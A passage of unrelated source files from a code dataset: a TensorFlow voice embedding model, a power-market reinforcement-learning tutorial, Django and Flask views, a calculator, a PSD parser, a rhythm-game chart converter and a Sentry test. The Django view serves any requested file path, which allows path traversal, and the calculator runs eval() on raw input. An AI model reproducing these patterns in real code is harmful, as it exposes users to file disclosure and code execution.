tf.float32, shape=(None, params.NUM_FRAMES, params.NUM_BANDS),\n name='input_features')\n '''\n features = images\n # Reshape to 4-D so that we can convolve a batch with conv2d().\n net = tf.reshape(features, [-1, VOICE_STFT_T, params.signal[\"n_mels\"], 1])\n\n # The VGG stack of alternating convolutions and max-pools.\n net = slim.conv2d(net, 64, scope='conv1')\n net = slim.max_pool2d(net, scope='pool1')\n net = slim.conv2d(net, 128, scope='conv2')\n net = slim.max_pool2d(net, scope='pool2')\n net = slim.repeat(net, 2, slim.conv2d, 256, scope='conv3')\n net = slim.max_pool2d(net, scope='pool3')\n net = slim.repeat(net, 2, slim.conv2d, 512, scope='conv4')\n net = slim.max_pool2d(net, scope='pool4')\n\n # Flatten before entering fully-connected layers\n net = slim.flatten(net)\n net = slim.repeat(net, 2, slim.fully_connected, 1000, scope='fc1')\n # The embedding layer.\n net = slim.fully_connected(net, params.embedding_size, scope='fc2')\n return tf.identity(net, name='embedding')\n\n\ndef build_model_old(is_training, images, params):\n \"\"\"Compute outputs of the model (embeddings for triplet loss).\n\n Args:\n is_training: (bool) whether we are training or not\n images: (dict) contains the inputs of the graph 
(features)\n this can be `tf.placeholder` or outputs of `tf.data`\n params: (Params) hyperparameters\n\n Returns:\n output: (tf.Tensor) output of the model\n \"\"\"\n out = images\n # Define the number of channels of each convolution\n # For each block, we do: 3x3 conv -> batch norm -> relu -> 2x2 maxpool\n num_channels = params.num_channels\n bn_momentum = params.bn_momentum\n channels = [num_channels, num_channels * 2]\n # input has shape [batch_size, VOICE_STFT_T, params.signal[\"n_mels\"]]\n for i, c in enumerate(channels):\n with tf.variable_scope('block_{}'.format(i+1)):\n out = tf.layers.conv2d(out, c, 3, padding='same')\n if params.use_batch_norm:\n out = tf.layers.batch_normalization(out, momentum=bn_momentum, training=is_training)\n out = tf.nn.relu(out)\n out = tf.layers.max_pooling2d(out, 2, 2)\n\n assert out.shape[1:] == [int((VOICE_STFT_T-1)/4), 20, num_channels * 2], out.shape[1:]\n\n out = tf.reshape(out, [-1, int((VOICE_STFT_T-1)/4) * 20 * num_channels * 2])\n with tf.variable_scope('fc_1'):\n out = tf.layers.dense(out, params.embedding_size)\n\n return out\n\n\n\n\n\ndef model_fn(features, labels, mode, params):\n \"\"\"Model function for tf.estimator\n\n Args:\n features: input batch of images\n labels: labels of the images\n mode: can be one of tf.estimator.ModeKeys.{TRAIN, EVAL, PREDICT}\n params: contains hyperparameters of the model (ex: `params.learning_rate`)\n\n Returns:\n model_spec: tf.estimator.EstimatorSpec object\n \"\"\"\n is_training = (mode == tf.estimator.ModeKeys.TRAIN)\n\n images = tf.feature_column.input_layer(features, params.feature_columns)\n images = tf.reshape(images, [-1, VOICE_STFT_T, params.signal[\"n_mels\"], 1])\n assert images.shape[1:] == [VOICE_STFT_T, params.signal[\"n_mels\"], 1], \"{}\".format(images.shape)\n\n # -----------------------------------------------------------\n # MODEL: define the layers of the model\n with tf.variable_scope('model'):\n # Compute the embeddings with the model\n embeddings = build_model(is_training, images, params)\n embedding_mean_norm = tf.reduce_mean(tf.norm(embeddings, axis=1))\n tf.summary.scalar(\"embedding_mean_norm\", embedding_mean_norm)\n\n if mode == tf.estimator.ModeKeys.PREDICT:\n input_labels = features[\"labels\"]\n print(\"Label is: {}\".format(input_labels))\n predictions = {'embeddings': embeddings, 'labels': input_labels}\n return tf.estimator.EstimatorSpec(mode=mode, predictions=predictions)\n\n labels = tf.cast(labels, tf.int64)\n #labels = tf.Print(labels, [labels], \"Batch labels: \", summarize=10)\n '''\n freq_y, freq_idx, freq_count = tf.unique_with_counts(labels)\n labels = tf.Print(labels, [labels, freq_y, freq_count], \"Batch labels: \", summarize=50)\n '''\n \n # Define triplet loss\n if params.triplet_strategy == \"batch_all\":\n tf.logging.info(\"Triplet loss type: batch_all\")\n loss, fraction = batch_all_triplet_loss(labels, embeddings, margin=params.margin,\n squared=params.squared)\n elif params.triplet_strategy == \"batch_hard\":\n tf.logging.info(\"Triplet loss type: batch_hard\")\n loss = batch_hard_triplet_loss(labels, embeddings, margin=params.margin,\n squared=params.squared)\n elif params.triplet_strategy == \"batch_semihard\":\n tf.logging.info(\"Triplet loss type: batch_semihard\")\n loss = triplet_semihard_loss(labels, embeddings, margin=params.margin)\n else:\n raise ValueError(\"Triplet strategy not recognized: {}\".format(params.triplet_strategy))\n\n # -----------------------------------------------------------\n # METRICS AND SUMMARIES\n # Metrics for 
evaluation using tf.metrics (average over whole dataset)\n # TODO: some other metrics like rank-1 accuracy?\n with tf.variable_scope(\"metrics\"):\n eval_metric_ops = {\"embedding_mean_norm\": tf.metrics.mean(embedding_mean_norm)}\n\n if params.triplet_strategy == \"batch_all\":\n eval_metric_ops['fraction_positive_triplets'] = tf.metrics.mean(fraction)\n\n if mode == tf.estimator.ModeKeys.EVAL:\n return tf.estimator.EstimatorSpec(mode, loss=loss, eval_metric_ops=eval_metric_ops)\n\n\n # Summaries for training\n tf.summary.scalar('loss', loss)\n if params.triplet_strategy == \"batch_all\":\n tf.summary.scalar('fraction_positive_triplets', fraction)\n\n tf.summary.image('train_image', images, max_outputs=1)\n\n # Define training step that minimizes the loss with the Adam optimizer\n optimizer = tf.train.AdamOptimizer(params.learning_rate)\n global_step = tf.train.get_global_step()\n if params.use_batch_norm:\n # Add a dependency to update the moving mean and variance for batch normalization\n with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):\n train_op = optimizer.minimize(loss, global_step=global_step)\n else:\n train_op = optimizer.minimize(loss, global_step=global_step)\n\n return tf.estimator.EstimatorSpec(mode, loss=loss, train_op=train_op)\n","sub_path":"TrueID/src/python/biometric/voice_embedding/voice_embedding/voice/model_fn.py","file_name":"model_fn.py","file_ext":"py","file_size_in_byte":9268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
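# A minimal NumPy sketch of the "batch_hard" strategy named in model_fn above:
# for each anchor, take its farthest same-label (hardest positive) and closest
# different-label (hardest negative) example in the batch, then apply the hinge.
# This is an illustration, not the project's batch_hard_triplet_loss implementation.
import numpy as np

def batch_hard_sketch(embeddings, labels, margin=0.5):
    # Pairwise Euclidean distance matrix, shape (batch, batch).
    d = np.linalg.norm(embeddings[:, None, :] - embeddings[None, :, :], axis=-1)
    same = labels[:, None] == labels[None, :]
    hardest_pos = np.where(same, d, 0.0).max(axis=1)
    hardest_neg = np.where(~same, d, np.inf).min(axis=1)
    return np.maximum(hardest_pos - hardest_neg + margin, 0.0).mean()

emb = np.random.rand(8, 4)
lab = np.array([0, 0, 1, 1, 2, 2, 3, 3])
print(batch_hard_sketch(emb, lab))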
+{"seq_id":"169307637","text":"#------------------------------------------------------------------------------\n# Pylon Tutorial \"Reinforcement Learning\"\n#\n# Author: Richard Lincoln, r.w.lincoln@gmail.com\n#------------------------------------------------------------------------------\n\n__author__ = 'Richard Lincoln, r.w.lincoln@gmail.com'\n\nimport sys, logging\nfrom pylon import Case, Bus, Generator\n\nfrom pyreto import \\\n MarketExperiment, ParticipantEnvironment, ProfitTask, SmartMarket\n\nfrom pyreto.renderer import ExperimentRenderer\n\nfrom pybrain.tools.shortcuts import buildNetwork\nfrom pybrain.rl.agents import LearningAgent\nfrom pybrain.rl.learners import ENAC\n\nlogging.basicConfig(stream=sys.stdout, level=logging.DEBUG,\n format=\"%(levelname)s: %(message)s\")\n\n\"\"\" Create a simple case. \"\"\"\ng1 = Generator(name=\"G1\", p_max=60.0, p_min=0.0)\ng2 = Generator(name=\"G2\", p_max=100.0, p_min=0.0)\nbus1 = Bus(name=\"Bus1\", generators=[g1, g2], p_demand=80.0, q_demand=0.0)\ncase = Case(name=\"1Bus\", buses=[bus1])\n\n\"\"\" The market will clear submitted offers/bids and return dispatch info. \"\"\"\nmkt = SmartMarket(case)\n\nagents = []\ntasks = []\nfor g in bus1.generators:\n \"\"\" Create an environment for each agent with an asset and a market. \"\"\"\n env = ParticipantEnvironment(g, mkt, n_offbids=2)\n\n \"\"\" Create a task for the agent to achieve. \"\"\"\n task = ProfitTask(env)\n\n \"\"\" Build an artificial neural network for the agent. \"\"\"\n net = buildNetwork(task.outdim, task.indim, bias=False,\n outputbias=False)\n# net._setParameters(array([9]))\n\n \"\"\" Create a learning agent with a learning algorithm. \"\"\"\n agent = LearningAgent(module=net, learner=ENAC())\n \"\"\" Initialize parameters (variance). \"\"\"\n# agent.setSigma([-1.5])\n \"\"\" Set learning options. \"\"\"\n agent.learner.alpha = 2.0\n # agent.learner.rprop = True\n agent.actaspg = False\n# agent.disableLearning()\n\n agents.append(agent)\n tasks.append(task)\n\n\"\"\" The Experiment will coordintate the interaction of the given agents and\ntheir associated tasks. \"\"\"\nexperiment = MarketExperiment(tasks, agents, mkt)\nexperiment.setRenderer(ExperimentRenderer())\n\n\"\"\" Instruct the experiment to coordinate a set number of interactions. \"\"\"\nexperiment.doInteractions(3)\n","sub_path":"doc/tutorials/rl.py","file_name":"rl.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"272827869","text":"from django.shortcuts import render\nfrom django.http import Http404, HttpResponse\nfrom forms import *\nfrom models import *\n\n# render home page\ndef populate_home_page(request):\n\tsuccess = 0\n\tif request.method == 'POST':\n\t\tform = NewUser(request.POST)\n\t\tif form.is_valid():\n\t\t\tu = Contact(email = form.cleaned_data['email'],)\n\t\t\tu.save()\n\t\t\tsuccess = 2\n\t\telse:\n\t\t\tform = NewUser()\n\t\t\tsuccess = 1\n\telse:\n\t\tform = NewUser()\n\n\treturn render(request, 'index.html', {'form': form, 'success': success})\n\n# deals with static files (frontend)\ndef return_static_file(request, fname):\n\ttry:\n\t\tf = open(os.path.join(os.getcwd(), fname))\n\t\treturn HttpResponse(f.read())\n\texcept:\n\t\t raise Http404(\"File \" + os.path.join(os.getcwd(), fname) + \" does not exist.\")","sub_path":"portal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"77558301","text":"from . import mapping\nimport os\nimport matplotlib.pyplot as plt\nfrom flask import render_template\nimport base64\n\n@mapping.route('/')\ndef index():\n plt.plot([1, 2, 3, 4])\n plt.ylabel('some numbers')\n # import logging\n # logging.error('1111')\n from run import app\n app.logger.error('An error occurred')\n # raise Exception(\"自定义异常\")\n plt.savefig(os.getcwd() + '/temp/temp.jpg')\n form = \"\"\n with open(os.getcwd() + '/temp/temp.jpg','rb') as rf:\n # byte -> base64 and byte -> str\n form = base64.b64encode(rf.read()).decode(encoding=\"utf-8\")\n # 查看类型\n print(type(form))\n return render_template('mapping/mapping.html', form=form)\n\n@mapping.route('/echarts')\ndef echarts():\n form = \"\"\n return render_template('mapping/echarts.html', form=form)\n","sub_path":"app/mapping/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"523786847","text":"#!/usr/bin/env python3\n#\n# Command line calc tools programme\n#\n\n\nfrom math import *\n\n\ndef version():\n ver = 'Calc Command Line Tools V1.0'\n print(\"\\033[1;32m%s\\033[0m\" % ver)\n\n\ndef run():\n version()\n\n while True:\n cmd = input(\">>> \")\n # Input enter key\n if (cmd == ''):\n continue\n\n if (cmd.lower() == 'q'):\n break\n\n try:\n # eval func: string to expression\n print(eval(cmd))\n except:\n print(\"\\033[1;31mExpression error, please input again.\\033[0m\")\n\n\nif __name__ == '__main__':\n run()\n","sub_path":"calc/calc-cmd.py","file_name":"calc-cmd.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"175167395","text":"import psd_tools.reader\nimport psd_tools.decoder\nfrom psd_tools.constants import TaggedBlock, SectionDivider, ImageResourceID\nimport matplotlib.pyplot as plt\n\nimage_path = '../psd/Case_204_G11_40.psd'\n#image_path = './Case_271_O6_40.psd'\n#image_path = '/./Case_322_I3_40.psd'\nim = plt.imread(image_path)\n\nwith open(image_path, 'rb') as fp:\n binary = psd_tools.reader.parse(fp)\n decoded = psd_tools.decoder.parse(binary)\n\nimg_dict = decoded.image_resource_blocks\nfor item in img_dict:\n if item.resource_id == 1080:\n count_data=item\n\ncount_level = count_data.data.descriptor.items[1][1][0]\nid_list = [str(item.items[3][1].value) for item in count_level]\nnum_labels = len(id_list)\n\nraw_data_pos_dict = {}\nfor i in range(num_labels):\n raw_data_pos_dict[id_list[i]] = count_level[i].items[7][1].items\n\ndata_pos_dict = {}\nfor key,value in raw_data_pos_dict.items(): #In python 2.7 this was .iteritems()\n data_pos_dict[key] = [[float(point.items[0][1].value),float(point.items[1][1].value)] for point in value]\n\nprint (data_pos_dict.keys())\nprint ([len(data_pos_dict[key]) for key in data_pos_dict])\nchoice1 = data_pos_dict[list(data_pos_dict.keys())[0]] # In python 2.7 this was choice1 = data_pos_dict[data_pos_dict.keys()[0]]\nx1,y1 = [i[0] for i in choice1],[i[1] for i in choice1]\nchoice2 = data_pos_dict[list(data_pos_dict.keys())[1]]\nx2,y2 = [i[0] for i in choice2],[i[1] for i in choice2]\nchoice3 = data_pos_dict[list(data_pos_dict.keys())[2]]\nx3,y3 = [i[0] for i in choice3],[i[1] for i in choice3]\nchoice4 = data_pos_dict[list(data_pos_dict.keys())[3]]\nx4,y4 = [i[0] for i in choice4],[i[1] for i in choice4]\n\nimplot = plt.imshow(im)\nplt.scatter(x1,y1,s=4,c='r')\nplt.scatter(x2,y2,s=4,c='c')\nplt.scatter(x3,y3,s=4,c='violet')\nplt.scatter(x4,y4,s=4)\nplt.show()\n","sub_path":"labels/psd_parse_and_plot.py","file_name":"psd_parse_and_plot.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"625005140","text":"import glob\r\nimport json\r\nimport os\r\nimport shutil\r\n\r\nimport hexdump\r\n\r\nUSE_TIMESIGS = False\r\n\r\ndef read_string(data, offset):\r\n string_bytes = data[offset:data.index(b'\\0', offset)]\r\n return string_bytes.decode('shift-jis').strip('\\0')\r\n\r\n\r\ndef convert_raw_chart(found_charts, song_info=None):\r\n song_id = song_info['song_id']\r\n bpm = song_info['bpm']\r\n\r\n # Parse ttb file for timestamps\r\n ttb_path = os.path.join(\"raw_data_dct\", \"ttb%03d02.bin\" % song_id)\r\n ttb_by_measure = {}\r\n ttb_data = bytearray(open(ttb_path, \"rb\").read())\r\n ttb_header = ttb_data[:8]\r\n ttb_data = ttb_data[8:]\r\n\r\n measure_timestamps = {}\r\n cur_bars = 0\r\n\r\n bpms = {0: 0}\r\n\r\n song_offset_time = int.from_bytes(ttb_data[2:4], 'little')\r\n song_offset = (((song_offset_time * 441) / 75) * 100) / 44100\r\n song_offset = -song_offset\r\n\r\n timing_info_by_bar = {}\r\n requires_timing_info = False\r\n last_time_sig = None\r\n measure_to_beat = {}\r\n last_measure = 0\r\n\r\n cur_bar_len = 4\r\n for i in range(4, len(ttb_data) - 4, 4):\r\n prev_bar_len = cur_bar_len\r\n cur_time = int.from_bytes(ttb_data[i+2:i+4], 'little')\r\n prev_time = int.from_bytes(ttb_data[i+2-4:i+4-4], 'little')\r\n cur_bar_len = int.from_bytes(ttb_data[i-4:i+2-4], 'little')\r\n\r\n cur_timestamp = (((cur_time * 441) / 75) * 100) / 44100\r\n prev_timestamp = (((prev_time * 441) / 75) * 100) / 44100\r\n\r\n if song_offset is None:\r\n song_offset = -prev_timestamp\r\n\r\n d = (cur_bar_len / 4) * 4 if USE_TIMESIGS else 4\r\n cur_bpm = 1 / (((cur_timestamp - prev_timestamp) * (1000 / d)) / 60000)\r\n\r\n # print(cur_bars, \"%04x (%f) %04x (%f)\" % (prev_time, prev_timestamp, cur_time, cur_timestamp), cur_bpm, cur_bar_len)\r\n\r\n if last_time_sig is None or cur_bar_len != last_time_sig:\r\n timing_info_by_bar[cur_bars] = cur_bar_len\r\n last_time_sig = cur_bar_len\r\n\r\n if cur_bar_len != 4:\r\n requires_timing_info = True\r\n\r\n bpms[cur_bars] = cur_bpm\r\n cur_bars += cur_bar_len if USE_TIMESIGS else 4\r\n\r\n if cur_bar_len != 4:\r\n print(\"Found bar of %d in %s\" % (cur_bar_len, song_info['title']))\r\n\r\n ### Handle conversion of chart\r\n chart = \"\"\"#TITLE:%s;\r\n#MUSIC:bgm.mp3;\r\n#PREVIEW:preview.mp3;\r\n#OFFSET:%lf;\r\n#BPMS:%s;\r\n#DISPLAYBPM:%d;\r\n\"\"\" % (song_info.get('title', '(Untitled)'), song_offset, \",\".join([\"%d=%f\" % (k, bpms[k]) for k in bpms]), song_info.get('bpm', 128))\r\n\r\n if requires_timing_info and USE_TIMESIGS:\r\n chart += \"#TIMESIGNATURES:%s;\" % (\",\".join([\"%d=%d=4\" % (k, timing_info_by_bar[k]) for k in timing_info_by_bar]))\r\n\r\n for idx, data in found_charts:\r\n valid_charts = [0, 1, 2, 7, 8]\r\n\r\n if idx not in valid_charts:\r\n continue\r\n\r\n chart_type = {\r\n 0: \"dance-single\",\r\n 1: \"dance-single\",\r\n 2: \"dance-single\",\r\n 3: \"dance-couple\",\r\n 4: \"dance-couple\",\r\n 5: \"dance-couple\",\r\n 7: \"dance-double\",\r\n 8: \"dance-double\",\r\n }[idx]\r\n\r\n chart_diff = {\r\n 0: \"Easy\",\r\n 1: \"Medium\",\r\n 2: \"Hard\",\r\n 3: \"Easy\",\r\n 4: \"Medium\",\r\n 5: \"Hard\",\r\n 7: \"Easy\",\r\n 8: \"Medium\",\r\n }[idx]\r\n\r\n diff_rating = {\r\n 0: song_info['diffs']['single']['basic'],\r\n 1: song_info['diffs']['single']['trick'],\r\n 2: song_info['diffs']['single']['maniac'],\r\n 3: song_info['diffs']['couple']['basic'],\r\n 4: song_info['diffs']['couple']['trick'],\r\n 5: song_info['diffs']['couple']['maniac'],\r\n 7: song_info['diffs']['double']['basic'],\r\n 8: 
song_info['diffs']['double']['trick'],\r\n }[idx]\r\n\r\n chunks = [data[i:i+8] for i in range(0, len(data), 8)]\r\n events = []\r\n last_measure = 0\r\n\r\n for chunk in chunks:\r\n def get_arrows_str(n):\r\n s = \"\"\r\n s += \"1\" if (n & 8) else \"0\"\r\n s += \"1\" if (n & 4) else \"0\"\r\n s += \"1\" if (n & 2) else \"0\"\r\n s += \"1\" if (n & 1) else \"0\"\r\n return s\r\n\r\n measure = chunk[2]\r\n beat = chunk[3]\r\n cmd = int.from_bytes(chunk[4:], 'little')\r\n\r\n beat = round((beat / 256) * 192)\r\n\r\n event = {\r\n 'measure': measure,\r\n 'beat': beat,\r\n }\r\n\r\n if cmd == 4:\r\n # Is a note\r\n p1_note = chunk[0]\r\n p2_note = chunk[1]\r\n\r\n p1_str = get_arrows_str(p1_note)\r\n p2_str = get_arrows_str(p2_note)\r\n\r\n note_data = p1_str\r\n\r\n if chart_type == \"dance-single\":\r\n if p2_note != 0:\r\n print(\"P2 note has data for single chart\")\r\n # exit(1)\r\n\r\n else:\r\n note_data += p2_str\r\n\r\n event['cmd'] = 'note'\r\n event['data'] = note_data\r\n\r\n elif cmd == 0x100:\r\n # End song\r\n event['cmd'] = 'end'\r\n last_measure = measure + 1\r\n\r\n else:\r\n print(\"Unknown cmd value\", cmd)\r\n exit(1)\r\n\r\n events.append(event)\r\n\r\n if song_info is None:\r\n song_info = {}\r\n\r\n measure_data = {}\r\n for i in range(last_measure):\r\n measure_data[i] = []\r\n\r\n measure_data = {}\r\n for event in events:\r\n if event['cmd'] != \"note\":\r\n continue\r\n\r\n if event['measure'] not in measure_data:\r\n d = \"00000000\" if \"double\" in chart_type else \"0000\"\r\n measure_data[event['measure']] = [d] * 192\r\n\r\n # print(event['beat'], len(measure_data[event['measure']]))\r\n measure_data[event['measure']][event['beat']] = event['data']\r\n\r\n for i in range(last_measure):\r\n if i not in measure_data:\r\n d = \"00000000\" if \"double\" in chart_type else \"0000\"\r\n measure_data[i] = [d]\r\n\r\n arrow_data = \"\\n,\\n\".join([\"\\n\".join(measure_data[k]) for k in sorted(list(measure_data.keys()))])\r\n\r\n chart +=\"\"\"\r\n#NOTES:\r\n %s:\r\n :\r\n %s:\r\n %d:\r\n 0,0,0,0,0:\r\n%s\r\n;\"\"\" % (chart_type, chart_diff, diff_rating, arrow_data)\r\n\r\n return chart\r\n\r\n\r\n\r\nsonglist_info = {}\r\ndata = bytearray(open(\"dct.exe\", \"rb\").read())\r\n\r\nbase_diff = 0x8000f800\r\nsonglist_offset = 0x4d48\r\nsong_count = 0x340 // 0x40\r\n\r\nfor i in range(0, song_count * 0x40, 0x40):\r\n chunk = data[songlist_offset+i:songlist_offset+i+0x40]\r\n\r\n song_id = int.from_bytes(chunk[0x06:0x08], 'little')\r\n is_unlocked = chunk[0]\r\n unk_flag = chunk[1]\r\n timing_type = int.from_bytes(chunk[2:4], 'little')\r\n audio_idx = chunk[0x15]\r\n bpm = int.from_bytes(chunk[0x04:0x06], 'little')\r\n\r\n diffs = {\r\n 'single': {\r\n 'basic': int.from_bytes(chunk[0x24:0x24+2], 'little') / 2,\r\n 'trick': int.from_bytes(chunk[0x26:0x26+2], 'little') / 2,\r\n 'maniac': int.from_bytes(chunk[0x28:0x28+2], 'little') / 2,\r\n },\r\n 'double': {\r\n 'basic': int.from_bytes(chunk[0x34:0x34+2], 'little') / 2,\r\n 'trick': int.from_bytes(chunk[0x36:0x36+2], 'little') / 2,\r\n },\r\n 'couple': {\r\n 'basic': int.from_bytes(chunk[0x2c:0x2c+2], 'little') / 2,\r\n 'trick': int.from_bytes(chunk[0x2e:0x2e+2], 'little') / 2,\r\n 'maniac': int.from_bytes(chunk[0x30:0x30+2], 'little') / 2,\r\n },\r\n }\r\n\r\n title_ptr = int.from_bytes(chunk[8:8+4], 'little') - base_diff\r\n title = read_string(data, title_ptr)\r\n\r\n artist_ptr = int.from_bytes(chunk[12:12+4], 'little') - base_diff\r\n artist = read_string(data, artist_ptr)\r\n\r\n image_ptr = 
int.from_bytes(chunk[16:16+4], 'little') - base_diff\r\n image = read_string(data, image_ptr)\r\n\r\n songlist_info[song_id] = {\r\n 'song_id': song_id,\r\n 'title': title,\r\n 'artist': artist,\r\n 'title_image': image,\r\n 'diffs': diffs,\r\n 'bpm': bpm,\r\n 'timing_type': timing_type,\r\n 'is_unlocked': is_unlocked,\r\n 'bgm_filename': \"D%04d.MP3\" % (audio_idx - 2),\r\n 'preview_filename': \"D%04d.MP3\" % (audio_idx - 28),\r\n }\r\n\r\n print(title)\r\n hexdump.hexdump(chunk)\r\n print()\r\n\r\n\r\nfor filename in glob.glob(\"raw_data_dct/seq*.bin\"):\r\n data = bytearray(open(filename, \"rb\").read())\r\n\r\n header = data[:0x78]\r\n data = data[0x78:]\r\n\r\n found_charts = []\r\n for i in range(0, len(header), 0x0c):\r\n idx = i // 0x0c\r\n exists = int.from_bytes(header[i:i+4], 'little')\r\n length = int.from_bytes(header[i+4:i+8], 'little') * 8\r\n offset = int.from_bytes(header[i+8:i+12], 'little') * 8\r\n\r\n if exists == 0:\r\n assert(length == 0 and offset == 0)\r\n continue\r\n\r\n # print(\"%d %d %04x %04x | %08x -> %08x (%08x)\" % (idx, exists, length, offset, offset, offset + length, len(data)))\r\n\r\n chart_data = data[offset:offset+length]\r\n found_charts.append((idx, chart_data))\r\n\r\n if len(found_charts) != 5:\r\n print(\"Found %d charts in %s\" % (len(found_charts), filename))\r\n\r\n basename = os.path.splitext(os.path.basename(filename))[0]\r\n song_id = int(basename[3:6], 10)\r\n\r\n song_info = songlist_info.get(song_id, None)\r\n if song_info is not None:\r\n basename = song_info['title']\r\n\r\n else:\r\n song_info = {\r\n 'title': \"Unknown\",\r\n 'song_id': song_id,\r\n 'bpm': 128,\r\n 'diffs': {\r\n 'single': {\r\n 'basic': 1,\r\n 'trick': 2,\r\n 'maniac': 3,\r\n },\r\n 'double': {\r\n 'basic': 1,\r\n 'trick': 2,\r\n },\r\n 'couple': {\r\n 'basic': 1,\r\n 'trick': 2,\r\n 'maniac': 3,\r\n },\r\n }\r\n }\r\n\r\n basepath = os.path.join(\"charts_output_dct\", basename)\r\n os.makedirs(basepath, exist_ok=True)\r\n\r\n for idx, chart in found_charts:\r\n chart_mapping = {\r\n 0: \"single_basic.bin\",\r\n 1: \"single_trick.bin\",\r\n 2: \"single_maniac.bin\",\r\n 3: \"couple_basic.bin\",\r\n 4: \"couple_trick.bin\",\r\n 5: \"couple_maniac.bin\",\r\n 7: \"double_basic.bin\",\r\n 8: \"double_trick.bin\",\r\n }\r\n\r\n chart_filename = chart_mapping.get(idx, \"%02d.bin\" % idx)\r\n\r\n if idx not in chart_mapping:\r\n print(\"Found unknown chart\", idx)\r\n\r\n # open(os.path.join(basepath, chart_filename), \"wb\").write(chart)\r\n\r\n # if \"night\" in song_info['title'].lower():\r\n try:\r\n chart_converted = convert_raw_chart(found_charts, song_info)\r\n open(os.path.join(basepath, \"chart.sm\"), \"w\").write(chart_converted)\r\n except:\r\n print(\"Couldn't convert %s\" % (filename))\r\n\r\n # if song_info is not None:\r\n # # json.dump(song_info, open(os.path.join(basepath, \"_metadata.json\"), \"w\"), indent=4)\r\n\r\n # if 'bgm_filename' in song_info:\r\n # shutil.copyfile(os.path.join(\"cd_data\", song_info['bgm_filename']), os.path.join(basepath, \"bgm.mp3\"))\r\n\r\n # if 'preview_filename' in song_info:\r\n # shutil.copyfile(os.path.join(\"cd_data\", song_info['preview_filename']), os.path.join(basepath, \"preview.mp3\"))\r\n\r\n # shutil.copyfile(filename, os.path.join(basepath, os.path.basename(filename)))\r\n\r\n","sub_path":"sys573/tools/parse_charts_dct.py","file_name":"parse_charts_dct.py","file_ext":"py","file_size_in_byte":11747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
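# A quick check of the timestamp conversion used throughout the chart parser
# above: (((t * 441) / 75) * 100) / 44100 simplifies (since 441 * 100 = 44100)
# to t / 75 seconds, i.e. the ttb values count 1/75-second units, the CD sector
# rate, and the code is converting sector counts to seconds.
t = 1234
assert abs((((t * 441) / 75) * 100) / 44100 - t / 75) < 1e-9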
+{"seq_id":"35834586","text":"from __future__ import absolute_import\n\nfrom django.utils import timezone\nfrom exam import fixture\n\nfrom sentry.api.serializers import serialize\nfrom sentry.models import SavedSearch\nfrom sentry.models.savedsearch import DEFAULT_SAVED_SEARCHES\nfrom sentry.testutils import APITestCase\n\n\nclass OrganizationSearchesListTest(APITestCase):\n endpoint = 'sentry-api-0-organization-searches'\n\n @fixture\n def user(self):\n return self.create_user('test@test.com')\n\n def test_simple(self):\n self.login_as(user=self.user)\n team = self.create_team(members=[self.user])\n project1 = self.create_project(teams=[team], name='foo')\n project2 = self.create_project(teams=[team], name='bar')\n\n SavedSearch.objects.create(\n project=project1,\n name='bar',\n query=DEFAULT_SAVED_SEARCHES[0]['query'],\n )\n included = [\n SavedSearch.objects.create(\n name='Global Query',\n query=DEFAULT_SAVED_SEARCHES[0]['query'],\n is_global=True,\n date_added=timezone.now().replace(microsecond=0)\n ),\n SavedSearch.objects.create(\n project=project1,\n name='foo',\n query='some test',\n date_added=timezone.now().replace(microsecond=0)\n ),\n SavedSearch.objects.create(\n project=project1,\n name='wat',\n query='is:unassigned is:unresolved',\n date_added=timezone.now().replace(microsecond=0)\n ),\n SavedSearch.objects.create(\n project=project2,\n name='foo',\n query='some test',\n date_added=timezone.now().replace(microsecond=0)\n ),\n ]\n\n included.sort(key=lambda search: (search.name, search.id))\n response = self.get_valid_response(self.organization.slug)\n response.data.sort(key=lambda search: (search['name'], search['projectId']))\n assert response.data == serialize(included)\n\n\nclass OrgLevelOrganizationSearchesListTest(APITestCase):\n endpoint = 'sentry-api-0-organization-searches'\n\n @fixture\n def user(self):\n return self.create_user('test@test.com')\n\n def get_response(self, *args, **params):\n params['use_org_level'] = '1'\n return super(OrgLevelOrganizationSearchesListTest, self).get_response(\n *args,\n **params\n )\n\n def create_base_data(self):\n team = self.create_team(members=[self.user])\n SavedSearch.objects.create(\n project=self.create_project(teams=[team], name='foo'),\n name='foo',\n query='some test',\n date_added=timezone.now().replace(microsecond=0)\n )\n SavedSearch.objects.create(\n organization=self.organization,\n owner=self.create_user(),\n name='foo',\n query='some other user\\'s query',\n date_added=timezone.now().replace(microsecond=0)\n )\n included = [\n SavedSearch.objects.create(\n name='Global Query',\n query=DEFAULT_SAVED_SEARCHES[0]['query'],\n is_global=True,\n date_added=timezone.now().replace(microsecond=0)\n ),\n SavedSearch.objects.create(\n organization=self.organization,\n name='foo',\n query='some test',\n date_added=timezone.now().replace(microsecond=0)\n ),\n SavedSearch.objects.create(\n organization=self.organization,\n name='wat',\n query='is:unassigned is:unresolved',\n date_added=timezone.now().replace(microsecond=0)\n ),\n ]\n return included\n\n def check_results(self, expected):\n self.login_as(user=self.user)\n expected.sort(key=lambda search: (not search.is_pinned, search.name.lower()))\n response = self.get_valid_response(self.organization.slug)\n assert response.data == serialize(expected)\n\n def test_simple(self):\n included = self.create_base_data()\n self.check_results(included)\n\n def test_pinned(self):\n included = self.create_base_data()\n pinned_query = SavedSearch.objects.create(\n 
